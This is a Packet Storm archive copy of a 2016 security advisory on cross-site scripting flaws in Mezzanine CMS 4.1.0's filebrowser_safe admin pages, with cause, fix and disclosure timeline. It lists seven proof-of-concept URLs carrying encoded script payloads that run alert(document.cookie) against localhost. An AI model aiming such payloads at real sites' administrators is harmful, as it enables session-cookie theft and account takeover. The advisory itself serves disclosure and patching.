exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Mezzanine 4.1.0 Cross Site Scripting

Mezzanine 4.1.0 Cross Site Scripting
Posted Feb 3, 2016
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

Mezzanine version 4.1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 524c11303d89f8625930c3101599a2f7925f02d093c9e7b0ba3a472f23ebc8b3

Mezzanine 4.1.0 Cross Site Scripting

Change Mirror Download
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/MEZZANINE-CMS-XSS.txt



Vendor:
===================
mezzanine.jupo.org



Product:
================
Mezzanine 4.1.0

Mezzanine is an open source CMS built using the python based Django
framework.



Vulnerability Type:
===================
XSS



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

XSS entry points exists within the filebrowser_safe package.

In many areas throughout filebrowser, querystring parameters are passed
directly into templates to form URLS for links and forms,
and these were not being escaped correctly, therefore allowing arbitrary
JavaScript code to be injected.

In order to exploit this, a attacker would need to trick an authenticated
administrator into clicking a malicious link
or viewing a malicious web page containing the XSS payload.

Resolution:
Upgrade right away (pip install -U filebrowser_safe).

If for some reason you're unable to upgrade seamlessly, here is the fix
which you need to apply:
https://github.com/stephenmcd/filebrowser-safe/commit/14b30017d27ca6a952e1578ed8cecbb102979967



Exploit code(s):
===============

XSS 1)

http://localhost:8000/admin/media-library/rename/?ot=desc&o=date&filename=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E


XSS 2)

http://localhost:8000/admin/media-library/rename/?ot=desc&o=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&filename=


XSS 3)

http://localhost:8000/admin/media-library/rename/?ot=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&o=&filename=


XSS 4)

http://localhost:8000/admin/media-library/browse/?ot=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&dir=gallery&o=date


XSS 5)

http://localhost:8000/admin/media-library/upload/?ot=desc&dir=gallery&o=%3C%2Fscript%3E%3Cscript%3Ealert%28666%29%3C%2Fscript%3E


XSS 6)

http://localhost:8000/admin/media-library/upload/?ot=%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSS\n\nhyp3rlinx%27%29%3C%2Fscript%3E&dir=gallery&o=date


XSS 7)

http://localhost:8000/admin/media-library/upload//static/filebrowser/uploadify/?=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E



Disclosure Timeline:
=====================================
Vendor Notification: January 26, 2016
Feburary 2, 2016 : Public Disclosure



Exploitation Technique:
=======================
Remote



Severity Level:
================
High



Description:
=======================================================
Request Method(s): [+] GET


Vulnerable Product: [+] Mezzanine 4.1.0

=======================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    25 Files
  • 16
    Aug 16th
    3 Files
  • 17
    Aug 17th
    6 Files
  • 18
    Aug 18th
    4 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close